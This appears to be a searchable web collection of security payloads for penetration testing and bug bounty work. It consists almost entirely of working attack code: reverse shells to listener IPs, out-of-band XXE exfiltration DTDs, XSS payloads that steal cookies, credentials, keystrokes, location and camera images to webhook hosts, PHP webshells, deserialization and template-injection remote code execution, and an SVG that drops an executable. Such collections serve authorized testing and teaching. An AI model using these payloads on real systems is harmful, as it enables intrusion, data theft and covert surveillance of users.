Payloads Search
Search by title or code content
Comprehensive collection of security payloads for penetration testing and vulnerability research. Includes XSS payloads, SSTI injection, XXE attacks, command injection, SQL injection, LFI/RFI, deserialization exploits, and more. Essential resource for bug bounty hunters, security researchers, and ethical hackers testing web applications and APIs.
print hex kernel exploitation mhl
void examine(uint64_t* buffer, int n){
fprintf(stderr, "=== hex ===
");
for (int i = 0; i < n; i++){
fprintf(stderr, "[%04x] 0x%016lx
", i, buffer[i]);
}
}command injection sleep 5
"$(sleep 5)"hexprint kernel exploitation
void hex_print(void *buf, size_t size)
{
for (int i = 0; i < size; i += 0x10) {
printf("%016llx: ", (u64)(buf+i));
printf("0x");
for (int j = 0; j < 8; j++)
printf("%02x", *(unsigned char *)(buf + i + j));
printf(" ");
printf("0x");
for (int j = 0; j < 8; j++)
printf("%02x", *(unsigned char *)(buf + i + j));
puts("");
}
puts("");
}path leak pdf server-side render
<img src="x" onerror="document.write(window.location)"/>basic pdf server-side render
<img src="x" onerror="document.write('poc')"/>smaller toybox mkfifo shell
cd /data/data/com.ian.demo;rm f;mkfifo f;cat f|/system/bin/sh 2>&1|toybox nc 10.11.3.2 4444 >fandroid reverse shell toybox
rm /data/data/com.ian.demo/f;/system/bin/toybox mkfifo /data/data/com.ian.demo/f;cat /data/data/com.ian.demo/f|/system/bin/sh -i 2>&1|/system/bin/toybox nc 10.11.3.2 4444 >/data/data/com.ian.demo/fXXE dtd error based
<!ENTITY % file SYSTEM "file:///usr/local/"> <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'file:///nonexistant/%file;'>"> %eval; %exfiltrate;Only magic bytes file upload check bypass
echo -ne 'PNG
<?php echo "POC";system($_GET['''cmd''']); ?>' > file.png.phpGoogle Storage dir recursive download
curl -s "https://storage.googleapis.com/PUBLIC_FOLDER" | xmllint --xpath "//*[local-name()='Key']/text()" - | while read -r key; do mkdir -p "$(dirname "$key")" && curl -s "https://storage.googleapis.com/PUBLIC_FOLDER/$key" -o "$key" && echo "Downloaded: $key"; doneExfiltrate files Windows
$bytes = [System.IO.File]::ReadAllBytes("file.txt");Invoke-RestMethod -Uri "https://webhook.site/upload" -Method POST -Body $bytes -ContentType "application/octet-stream"poc.dtd for OOB XXE (for xml upload / import) -> on vps
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % all "<!ENTITY send SYSTEM 'https://webhook.site/{id}/leak?data=%file;'>">
%all;OOB XXE in XML upload / import -> poc.xml
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://vps.ian.nl/poc.dtd">
%dtd;
]>
<data>&send;</data>file.dtd for OOB XXE (for XXE XLSX oneliner) -> on vps
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://{webhook}/?x=%file;'>">
%eval;
%exfil;XXE XLSX oneliner -> malicious_example.xlsx
unzip sheet.xlsx -d extracted_xlsx && awk 'NR==1{print; print "<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://vps.ian.nl/file.dtd"> %xxe;]>"; next} $0 != "<?xml version="1.0" encoding="UTF-8" standalone="yes"?>" {print}' extracted_xlsx/xl/worksheets/sheet1.xml > tmp && mv tmp extracted_xlsx/xl/worksheets/sheet1.xml && cd extracted_xlsx && zip -r ../malicious_example.xlsx * >/dev/null && cd ..NodeJS RCE Deserialization - node-serialize
import requests, base64, json
js = "require('fs').readFileSync('/etc/passwd','utf8')"
codes = ','.join(str(ord(c)) for c in js)
payload = {"name": "_$$ND_FUNC$$_function(){return eval(String.fromCharCode(" + codes + "))}()"}
res = requests.post(url, json={"profile": base64.b64encode(json.dumps(payload).encode()).decode()})
print(res.text)XSLT RCE - Apache xalan 1.0
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader"
xmlns:isr="http://xml.apache.org/xalan/java/java.io.InputStreamReader">
<xsl:template match="/">
<xsl:variable name="p" select="rt:exec(rt:getRuntime(),'ping.exe w85z4z4aiuapnmvlyby5tf94zv5mtch1.oastify.com')"/>
<xsl:variable name="r" select="br:readLine(br:new(isr:new($p/inputStream)))"/>
<xsl:value-of select="$r"/>
</xsl:template>
</xsl:stylesheet>LFI - Apache xalan 1.0 & Saxon 9.x.x.x
<?xml version="1.0" encoding="utf-8"?>
<xsl:transform version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:saxon="http://saxon.sf.net/">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:text>poc</xsl:text>
<out xmlns:env="clitype:System.Environment" xmlns:os="clitype:System.OperatingSystem">
<xsl:value-of select="unparsed-text('file:///C:/Windows/System32/drivers/etc/hosts')"/>
</out>
<xsl:text>poc</xsl:text>
</xsl:template>
</xsl:transform>XSLT RCE Apache Java
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:process="http://xml.apache.org/xalan/java/java.lang.Process" xmlns:instrrdr="http://xml.apache.org/xalan/java/java.io.InputStreamReader" xmlns:buf="http://xml.apache.org/xalan/java/java.io.BufferedReader" xmlns:obj="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
<xsl:variable name="cmd">whoami</xsl:variable>
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtobject,$cmd)"/>
<xsl:variable name="inputStream" select="process:getInputStream($process)"/>
<xsl:variable name="inputStreamRdr" select="instrrdr:new($inputStream)"/>
<xsl:variable name="bufReader" select="buf:new($inputStreamRdr)"/>
<xsl:variable name="ts" select="obj:toString(buf:readLine($bufReader))"/>
<xsl:value-of select="$ts" />
</xsl:template>
</xsl:stylesheet>lfi with zip symlink
ln -s /etc/passwd passwd.txt && zip --symlink test.zip passwd.txtXSLT version leak
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<br />Version: <xsl:value-of select="system-property('xsl:version')" />
<br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
<br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
</html>XSLT read dir - libxslt
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="php:function('opendir','./')"/>
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
</xsl:template></xsl:stylesheet>PHP filesystem listing with json_encode
<?=json_encode(scandir("/"));PHP filesystem Object based enum
<?=foreach (new DirectoryIterator("/") as $f) echo $f."\n";PHP filesystem enum with glob
<?=print_r(glob("/*"));PHP directory listing with array_walk
<?=array_walk(scandir("/"), function($v) { echo $v . "\n"; });>PHP directory listing with scandir
<?=var_dump(scandir("/"));PHP directory listing with array_map
<?=array_map(function($f){ echo $f."
"; }, scandir("/"));PHP lfi with highlight_file
<?=highlight_file('/etc/passwd');PHP lfi with readgzfile
<?=readgzfile('/etc/passwd');PHP standard lfi
<?=file_get_contents("/etc/passwd");PHP lfi
<?=highlight_file('/etc/passwd');Bypass XSS filter (gareth heyes)
<svg><a><animate attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://example.com?;javascript:alert(origin);0" /><text x=20 y=20>XSS</text></a>JSONPath Plus RCE ≤ 10.2.0
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('bash -c "bash -i >& /dev/tcp/192.168.1.1/443 0>&1"').toString())";cmd=''[['constructor']][['constructor']](p);cmd())].htaccess mime type bypass
AddType application/x-httpd-php .pocSSTI polyglot
${{<%[%'"}}%.Blind Command Injection
cat flag*|curl -d@- https://webhook.site/{webhook-id}GraphQl Introspection Query
{__schema{types{name,fields{name}}}}SMTP Injection CC
email=victim%40company.com%0d%0acc%3a%20hacker%40protonmail.com%0d%0aStandard XSS
<img src onerror=alert(1)>SSRF to redirect LFI in PDF
//1. Host this code on VPS as lfi.php
<?php header('Location: file://' . $_GET['url']); ?>
//2. Run the server
php -S 0.0.0.0:8888
//3. Input this in PDF
<iframe src="http://{vps_ip}:8888/lfi.php?url=%2fetc%2fpasswd" width="800" height="1000"></iframe>Three PDF SSRF
<img src="https://{webhook_url}/1"/>
<link rel="stylesheet" href="https://{webhook_url}/2">
<iframe src="https://{webhook_url}/3"></iframe>WebSocket XSS Cookie Stealer
<img src="x" onerror="socket.send(document.cookie)">Chromium tab Crash CSS (old)
<iframe style="background:conic-gradient(in rec2020,red,red)">Keylogger XSS with history.replaceState
<img src onerror='
history.replaceState(null, null, "../../../login");
let buffer = "";
document.onkeypress=function(e){
buffer += String.fromCharCode(e.which);
if(buffer.length >= 25) {
fetch("https://webhook.site/{webhook-id}/?k=" + buffer);
buffer = "";
}
},this.remove();
'></img>AngularJS CSTI
{{$on.constructor('alert(1)')()}}SVG Malware Smuggler
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="500" height="500">
<text x="10"="50" font-family="Arial" font-size="20" fill="black">Open this image in a new tab</text>
<script type="application/ecmascript"><![CDATA[
document.addEventListener("DOMContentLoaded", function() {
function base64ToArrayBuffer(base64) {
var binary_string= window.atob(base64);
var len= binary_string.length;
var bytes= new Uint8Array(len);
for (var i= 0; i < len; i++) { bytes[i= binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file= 'U2FtcGxlIGZpbGUgYnkgaWFu'; // base64 encoded payload
var data= base64ToArrayBuffer(file);
var blob= new Blob([data], {type: 'octet/stream'});
var a= document.createElementNS('http://www.w3.org/1999/xhtml', 'a');
document.documentElement.appendChild(a);
a.setAttribute('style', 'display: none');
var url= window.URL.createObjectURL(blob);
a.href= url;
a.download= 'sample.exe'; // filename
a.click();
window.URL.revokeObjectURL(url);
});
]]></script>
</svg>Geolocation (GPS) Stealer
<script>
navigator.geolocation.getCurrentPosition(p=>{
fetch("https://webhook.site/{webhook_url}",{
method:'POST',
body:JSON.stringify({
lat:p.coords.latitude,
lon:p.coords.longitude,
accuracy:p.coords.accuracy,
timestamp:new Date().toISOString()
})
});
},e=>console.error(e),{enableHighAccuracy:true});
</script>XSS Leak Browser information
document.addEventListener('DOMContentLoaded', async () => {
const battery = await navigator.getBattery();
const gl = document.createElement('canvas').getContext('webgl');
const debugInfo = gl?.getExtension('WEBGL_debug_renderer_info');
const tzid = Intl.DateTimeFormat().resolvedOptions().timeZone;
fetch('https://webhook.site/{webhook_id}/', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
language: navigator.language,
charging: battery.charging,
battery: battery.level * 100,
ram: navigator.deviceMemory,
timezone: tzid,
webgl: debugInfo ? `Vendor: ${gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL)}, Renderer: ${gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL)}` : 'WebGL not supported'
})
});
});Leverage XSS to Capture Photos and Videos
<script>
const v = document.createElement('video'),
c = document.createElement('canvas');
navigator.mediaDevices?.getUserMedia({video:1})
.then(s => {
v.srcObject = s;
v.play();
v.onloadeddata = () => setTimeout(() => {
c.width = v.videoWidth;
c.height = v.videoHeight;
c.getContext('2d').drawImage(v, 0, 0);
fetch('https://webhook.site/{webhook-id}/', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
image: c.toDataURL('image/jpeg'),
timestamp: new Date().toISOString()
})
});
s.getTracks().forEach(t => t.stop());
}, 1000);
})
.catch(e => alert('Camera access error'));
</script>Prepared Statement Bypass NodeJS MySQL
{"username": "admin", "password": {"password": 1}}
username=admin&password[password]=1Race Condition on coupons -> purchase endpoint
import httpx
import asyncio
url = "http://example.com"
async def apply_coupon(session):
async with httpx.AsyncClient() as client:
response = await client.post(url + "/api/coupons/apply", json={"coupon_code": "SUMMER_2024"}, cookies=session)
session.update(response.cookies)
async def main():
async with httpx.AsyncClient() as client:
session = (await client.get(url + '/api/reset')).cookies
response = await client.post(url + "/api/purchase", json={"item": "BEER"})
session.update(response.cookies)
await asyncio.gather(*(apply_coupon(session) for _ in range(1, 20)))
response = await client.post(url + "/api/purchase", json={"item": "BEER"}, cookies=session)
print(response.json().get('flag'))
asyncio.run(main())XSS to Steal Secrets from (admin) pages
<script>
fetch("http://localhost:1337/admin-secret.txt")
.then(r => r.text())
.then(d => fetch("https://webhook.site/webhook-id/" + btoa(d)))
</script>NoSQL injection
{"username": {"$ne": null}, "password": {"$ne": null} }Node eval RCE
require('child_process').exec('sh -c "nc 192.168.1.2 9001 -e sh"')Stealing Cookies with fetch
<img src=x onerror="javascript:fetch('https://webhook.site/{id}'),{method:'POST',mode:'no-CORS',body:document.cookie});">Stealing Cookies
<img src=x onerror=this.src="https://webhook.site/?c="+document.cookie>PHP webshell cmd
<?php echo "Shell";system($_GET['cmd']); ?>Stealing Cookies less known way
javascript:navigator.sendBeacon('https://webhook.site/{webhook-id}/?c='+document.cookie)Python Pickle Deserialization
import pickle
import base64
import os
class Exploit:
def __reduce__(self):
return (os.system, ('nc 192.168.2.177 9001 -e sh',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(payload)XSS in SVG
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(1);
</script>
</svg>Prototype Pollution RCE in Pug
"__proto__.block": {
"type": "Text",
"line": "process.mainModule.require('child_process').execSync('bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'')"
}JsDelivr CSP Bypass
<script src="https://cdn.jsdelivr.net/gh/Vagebondcur/xss-jsdeliver@d96b9d94f1eea5d719d020b350e3fe111d796723/exploit.js"></script>PUG SSTI to RCE
#{spawn_sync = this.process.binding('spawn_sync')}
#{normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}}
#{spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;} for(c=0;c<a.stdio.length;c++){var e=a.stdio[c] && a.stdio[c].input;if(e=null){var f=a.stdio[c]= util._extend({},a.stdio[c]);isUint8Array(e) ? f.input=e : f.input=Buffer.from(e,a.encoding);}} console.log(a); var b=spawn_sync.spawn(a); if(b.output && a.encoding && a.encoding='buffer') for(=0;c<b.output.length;c++){ if(!b.output[c]) continue; b.output[c=b.output[c].toString(a.encoding); } return b.stdout=b.output && b.output[1], b.stderr=b.output && b.output[2], b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)), b;}}
#{payload='YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjAuNDAvODA4MCAwPiYx'}
#{resp=spawnSync('bash',['-c',(new Buffer(payload, 'base64')).toString('ascii')])}Vue.js V2 CSTI
{{constructor.constructor('alert(1)')()}}Vue.js V3 CSTI
{{_openBlock.constructor('alert(1)')()}}XSS in CDATA steal Login Credentials
<![CDATA[<]]><img src="x" onerror="var credentials=prompt('Please insert username and password separated by a colon (e.g., username:password):'); if(credentials) { var img=new Image(); img.src='https://ujhhrlvlfyivfk73njj018g7tyzpngb5.oastify.com?credentials=' + encodeURIComponent(credentials); document.body.appendChild(img); }"/><![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>About Security Payloads
This payload collection contains real-world exploit techniques for testing web application security, including Cross-Site Scripting (XSS), Server-Side Template Injection (SSTI), XML External Entity (XXE), Server-Side Request Forgery (SSRF), Local File Inclusion (LFI), Remote Code Execution (RCE), SQL injection, NoSQL injection, and deserialization attacks. Each payload is documented with practical examples for bug bounty hunting and security assessments.
The payloads cover multiple technologies including PHP, Node.js, Python, Java, Vue.js, AngularJS, Pug templates, and more. Use these for authorized penetration testing, Capture The Flag (CTF) competitions, security research, and learning about common web vulnerabilities.
Whether you're testing for OWASP Top 10 vulnerabilities or learning application security, this searchable payload database helps you quickly find the right exploit technique. Stay updated with the latest attack vectors and bypass techniques for modern web applications and APIs.